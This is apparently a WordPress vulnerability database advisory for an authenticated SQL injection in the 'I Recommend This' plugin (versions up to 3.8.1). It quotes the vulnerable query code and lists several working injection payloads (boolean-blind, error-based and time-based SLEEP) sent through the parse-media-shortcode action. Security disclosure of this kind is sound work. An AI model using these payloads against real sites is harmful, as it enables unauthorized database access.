WordPress Plugin Vulnerabilities

I Recommend This <= 3.8.1 - Authenticated SQL Injection

Description

Plugin description: "This plugin allows your visitors to simply like/recommend your posts instead of comment on it."
Active installs (according to https://wordpress.org/plugins/i-recommend-this/): 40.000+

It's possible to inject SQL into the [dot_recommends] shortcode, if the check for IP addresses is activated (default value). A low-privileged account is necessary for this - subscriber is enough. Very critical if debug mode of WordPress is active (see Vulnerabilites).

dot-irecommendthis.php:65

add_shortcode( 'dot_recommends', array( &$this, 'shortcode' ) );

dot-irecommendthis.php:559-564

function shortcode( $atts )
{
extract( shortcode_atts( array('id' => null), $atts ) );
return $this->dot_recommend($id);

} //shortcode

dot-irecommendthis.php:587-590 (function dot_recommend($id))

if( $options['disable_unique_ip'] != '1' ) {

$voteStatusByIp = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."irecommendthis_votes WHERE post_id = '$post_ID' AND ip = '$ip'");
}

This (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) great article will help understanding how to exploit shortcodes and why this works.

Vulnerabilities:

If WP_DEBUG is set to true:

Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload: shortcode=[dot_recommends id="2' RLIKE (SELECT (CASE WHEN
(5258=5258) THEN 0x73686f7274636f64653d5b646f745f7265636f6d6d656e64732069643d22
325f5f424f554e4445445f494e4a454354494f4e5f4d41524b5f5f225d26616374696f6e3d706172
73652d6d656469612d73686f7274636f6465 ELSE 0x28 END))-- ZKlm"]&action=parse-media
-shortcode

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (EXTRACTVALUE)
Payload: shortcode=[dot_recommends id="2' AND EXTRACTVALUE(2988,CO
NCAT(0x5c,0x716a766a71,(SELECT (ELT(2988=2988,1))),0x7162707a71))-- LCIV"]&actio
n=parse-media-shortcode

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: shortcode=[dot_recommends id="2' AND (SELECT * FROM (SELE
CT(SLEEP(5)))BQPZ)-- NVfD"]&action=parse-media-shortcode

If WP_DEBUG is set to false (should be the most common scenario):

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: shortcode=[dot_recommends id="2' AND (SELECT * FROM (SELE
CT(SLEEP(5)))NxWj)-- JHJu"]&action=parse-media-shortcode
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEE
PTIME])))))[RANDSTR])

Proof of Concept

Affects Plugins

Plugin icon
i-recommend-this
Fixed in 3.8.2

References

URL
https://wordpress.org/plugins/i-recommend-this/
URL
https://plugins.trac.wordpress.org/changeset/1939391/i-recommend-this

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Submitter
Paul Dannewitz
Submitter twitter
padannewitz
Verified
No
WPVDB ID
af7aa0c4-d7a7-4712-a54d-5caefd2edab4

Timeline

Publicly Published
2017-08-14 (about 8 years ago)
Added
2017-08-16 (about 8 years ago)
Last Updated
2019-11-01 (about 6 years ago)

Other

Published
Title
Published
2025-10-14
Title
Outdoor <= 1.3.2 - Unauthenticated SQL Injection
Published
2025-10-07
Title
RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login < 6.0.6.3 - Authenticated (Administrator+) SQL Injection
Published
2016-07-29
Title
Ultimate Product Catalogue <= 3.9.8 - Unauthenticated Blind SQL Injection
Published
2023-11-23
Title
License Manager for WooCommerce < 2.2.11 - Authenticated (Administrator+) SQL Injection
Published
2022-04-13
Title
WP Video Gallery <= 1.7.1 - Unauthenticated SQLi